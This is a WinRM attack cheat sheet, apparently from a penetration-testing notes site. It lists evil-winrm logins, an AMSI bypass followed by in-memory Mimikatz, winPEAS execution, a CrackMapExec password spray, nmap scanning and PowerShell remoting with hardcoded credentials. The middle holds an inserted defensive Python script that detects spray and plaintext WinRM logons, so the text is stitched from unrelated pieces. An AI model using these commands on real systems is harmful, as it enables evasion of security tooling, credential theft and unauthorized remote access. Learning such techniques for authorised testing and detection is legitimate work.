WinRM
ABOUT
Windows Remote Management (WinRM) is Windows' built-in remote management protocol, driven from the command line. WinRM uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications. WinRM relies on TCP ports 5985 and 5986 for communication, with port 5986 using HTTPS. Services like remote PowerShell sessions and event log forwarding require WinRM.
Evil-WinRM
evil-winrm -i 13.13.13.13 -u venator17 -p password123
Use the menu command to see evil-winrm's commands and loaded scripts.
Before loading any script or executable we will need to bypass the Antimalware Scan Interface (AMSI). We can do it with the Bypass-4MSI command, which patches it.
Load Scripts
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is location of scripts
Bypass-4MSI # Bypassing AMSI
Invoke-Mimikatz.ps1 # Loading it into memory
Invoke-Mimikatz # Executing
Loading Executables
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is location of executables
Invoke-Binary /opt/executables/winPEAS.exe
Loading Files
You can upload files only from the directory in which you started evil-winrm.
upload /opt/executables/winPEAS.exe
./winPEAS.exe
Nmap WinRM
nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n
CrackMapExec
crackmapexec winrm 13.13.13.13 -u user.list -p password
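From the defender's side, the two WinRM facts above are what a detection should key on: one source trying many accounts against port 5985/5986 in a short window (the pattern a list-based tool like the one above produces), and successful sessions over the plaintext HTTP listener (5985) instead of HTTPS (5986). The following is an added example, not part of the original page or of any tool it names; the log format and every address, user and timestamp in it are constructed for the illustration.

```python
"""Flag WinRM password-spray patterns and plaintext-WinRM logons
from simple connection/auth log lines (constructed format)."""
from collections import defaultdict
from datetime import datetime, timedelta

WINRM_HTTP, WINRM_HTTPS = 5985, 5986

# Constructed sample log: timestamp src dst_port user result
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 5985 alice FAIL
2024-01-01T10:00:02 10.0.0.5 5985 bob FAIL
2024-01-01T10:00:03 10.0.0.5 5985 carol FAIL
2024-01-01T10:00:04 10.0.0.5 5985 dave FAIL
2024-01-01T10:00:05 10.0.0.5 5985 erin OK
2024-01-01T10:30:00 10.0.0.9 5986 admin OK
"""

def parse(log):
    """Turn each line into (timestamp, src, port, user, result)."""
    events = []
    for line in log.splitlines():
        ts, src, port, user, result = line.split()
        events.append((datetime.fromisoformat(ts), src, int(port), user, result))
    return events

def detect_spray(events, min_users=4, window=timedelta(minutes=5)):
    """Return source IPs that tried >= min_users distinct accounts
    against a WinRM port within `window` (any outcome counts)."""
    by_src = defaultdict(list)
    for ts, src, port, user, _ in events:
        if port in (WINRM_HTTP, WINRM_HTTPS):
            by_src[src].append((ts, user))
    flagged = set()
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged.add(src)
                break
    return flagged

def plaintext_sessions(events):
    """Successful WinRM logons over HTTP (5985) rather than HTTPS (5986)."""
    return [(src, user) for _, src, port, user, result in events
            if port == WINRM_HTTP and result == "OK"]

if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("spray sources:", detect_spray(ev))
    print("plaintext WinRM logons:", plaintext_sessions(ev))
```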
PowerShell
PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred